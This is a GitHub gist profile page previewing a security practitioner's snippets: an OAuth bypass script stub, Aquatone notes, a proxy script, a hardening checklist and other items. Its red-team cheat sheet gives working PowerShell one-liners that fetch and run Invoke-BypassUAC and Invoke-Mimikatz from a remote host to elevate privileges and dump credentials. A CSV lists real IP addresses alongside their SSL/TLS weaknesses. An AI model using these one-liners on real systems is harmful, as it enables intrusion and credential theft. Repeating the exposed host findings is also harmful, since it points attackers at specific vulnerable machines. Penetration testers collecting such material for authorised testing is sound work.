Skip to content

Instantly share code, notes, and snippets.

View sec-js's full-sized avatar

sec-js

13 followers · 24 following
  • Dallas texas
View GitHub Profile
@sec-js
sec-js / validOAuth.py
Last active March 27, 2023 19:39
oauth-authentication-bypass-via-oauth-implicit-flow
#!/usr/bin/env python3
# Authentication bypass via OAuth implicit flow
from bs4 import BeautifulSoup
import requests
import sys
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
@sec-js
sec-js / gist:4cc20c78ca4797b0df490d4442198427
Created October 19, 2022 20:28
Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
# AQUATONE
Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
## Installation
1. Install [Google Chrome](https://www.google.com/chrome/) or [Chromium](https://www.chromium.org/getting-involved/download-chromium) browser -- **Note:** Google Chrome is currently giving unreliable results when running in *headless* mode, so it is recommended to install Chromium for the best results.
2. Download the [latest release](https://github.com/michenriksen/aquatone/releases/latest) of Aquatone for your operating system.
3. Uncompress the zip file and move the `aquatone` binary to your desired location. You probably want to move it to a location in your `$PATH` for easier use.
@sec-js
sec-js / RedTeam_CheatSheet.ps1
Created June 21, 2022 08:21 — forked from jivoi/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@sec-js
sec-js / AtomicTestsCommandLines.txt
Created June 21, 2022 08:21 — forked from jivoi/AtomicTestsCommandLines.txt
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_|
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
@sec-js
sec-js / List IO
Created June 8, 2022 05:21
Output.csv
Affected Hosts FQDN NAT Country Status SSL Certificate Signed Using Weak Hashing Algorithm (Known CA) SSL Certificate Expiry SSL Certificate Chain Contains RSA Keys Less Than 2048 bits SSL Version 2 and 3 Protocol Detection SSL Medium Strength Cipher Suites Supported (SWEET32) SSL RC4 Cipher Suites Supported (Bar Mitzvah) SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam) TLS Version 1.0 Protocol Detection Notes Advice from Mandiant
40.83.150.233 (443/TCP) MSFT P § Minimum Requirements for TLS Servers
40.83.150.233 (454/TCP) MSFT P NIST SP800-52
40.83.150.233 (8172/TCP) MSFT P
52.249.56.193 (443/TCP) MSFT P Azure App Gateway for TEL Customer Avoid any use of the following:
59.124.168.164 (443/TCP) Taiwan P 1. SSLv2, SSLv3, TLS 1.0, and TLS 1.1
61.210.160.152 (443/TCP) Japan P 2. Null / Anonymous cipher suites
61.210.162.134 (443/TCP) Japan P 3. Any export cipher suites and encryption using less than 128 bits
64.124.73
@sec-js
sec-js / Fragment
Last active February 10, 2022 20:37
Questions Follow-up I wanted to dress two questions I provided answer I felt better explained visually then what I said during this conversation. Logic Behind String(name)+Ingestion+and reverse name(string) +output of reverse strings:
#!/usr/bin/python
#
fo = open("foo.txt", "wb")
print "Name of the file: ", fo.name
# Close opend file
fo.close()
@sec-js
sec-js / Csinstall.txt
Created October 5, 2021 01:32
Vs studios install
curl https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > packages.microsoft.gpg
$ sudo install -o root -g root -m 644 packages.microsoft.gpg /usr/share/keyrings/
$ sudo sh -c 'echo "deb [arch=amd64 signed-by=/usr/share/keyrings/packages.microsoft.gpg] https://packages.microsoft.com/repos/vscode stable main" > /etc/apt/sources.list.d/vscode.list'
$ sudo apt-get install apt-transport-https
$ sudo apt-get update
$ sudo apt-get install code
@sec-js
sec-js / Proxy5.py
Created August 16, 2021 19:03
Proxy5
#!/usr/bin/python
# Filename s5.py
# Python Dynamic Socks5 Proxy
# Usage: python s5.py 1080
# Background Run: nohup python s5.py 1080 &
# Email: ringzero@557.im
import socket, sys, select, SocketServer, struct, time
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass
@sec-js
sec-js / Dropbox.txt
Created August 12, 2021 09:02
curl "https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh" -o dropbox_uploader.sh
@sec-js
sec-js / Linux hardening
Last active June 30, 2021 22:54
High level checklist
Linux hardening checklist
* Partitioning
* Separate partitions
* Restrict mount options
* Polyinstantiated directories
* Shared memory
* Encrypt partitions
* Summary checklist
* Physical Access
* Password for Single User Mode